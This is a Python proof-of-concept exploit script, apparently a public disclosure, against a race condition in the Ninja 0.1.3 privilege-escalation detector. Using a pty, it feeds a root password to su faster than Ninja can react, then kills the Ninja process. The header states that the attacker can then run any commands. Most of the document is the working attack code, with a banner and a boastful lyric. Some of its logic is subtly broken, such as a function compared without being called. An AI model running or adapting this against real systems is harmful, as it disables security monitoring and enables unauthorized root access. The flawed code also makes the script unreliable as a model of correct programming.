82 lines
No EOL
3 KiB
Python
Executable file
82 lines
No EOL
3 KiB
Python
Executable file
#[Title] Ninja privilege escalation detection and prevention system race condition
|
|
#[Author] Ben 'highjack' Sheppard
|
|
#[URL] http://highjack.github.io/
|
|
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
|
|
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
|
|
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
|
|
#[Software Link] http://forkbomb.org/ninja/
|
|
#[Date] 29/04/2015
|
|
#[Version] 0.1.3
|
|
#[Tested on] Kali Linux
|
|
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
|
|
|
|
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
|
|
#https://www.youtube.com/watch?v=eA136fOsSeQ
|
|
|
|
import pty, os, sys, subprocess
|
|
pid, fd = pty.fork()
|
|
|
|
#begin config
|
|
user = "root"
|
|
password = "mypassword" #change this :)
|
|
command = "killall -9 ninja"
|
|
#end config
|
|
|
|
|
|
def usage():
|
|
print """
|
|
@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@
|
|
@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@
|
|
@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@
|
|
!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!
|
|
@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!
|
|
!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!
|
|
!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!
|
|
:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!
|
|
:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::
|
|
: : : : :: :: : : : : : ::: : : : :: :: : : :::
|
|
|
|
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
|
|
[Author] Ben 'highjack' Sheppard
|
|
[URL] http://highjack.github.io/
|
|
|
|
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
|
|
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
|
|
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
|
|
"""
|
|
|
|
|
|
executions = 0
|
|
def check_procs():
|
|
p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
|
|
p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)
|
|
p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
|
|
output = p3.communicate()[0]
|
|
if output != "":
|
|
if executions != 0:
|
|
sys.exit(0)
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
def kill_ninja():
|
|
if pid == 0:
|
|
os.execvp("su", ["su", user, "-c", command])
|
|
elif pid > 0:
|
|
try:
|
|
os.read(fd, 1024)
|
|
os.write(fd, password + "\n")
|
|
os.read(fd,1024)
|
|
os.wait()
|
|
os.close(fd)
|
|
except:
|
|
usage()
|
|
print "[+] Ninja is terminated"
|
|
sys.exit(0)
|
|
|
|
|
|
while True:
|
|
kill_ninja()
|
|
if (check_procs == True):
|
|
executions = executions + 1
|
|
kill_ninja() |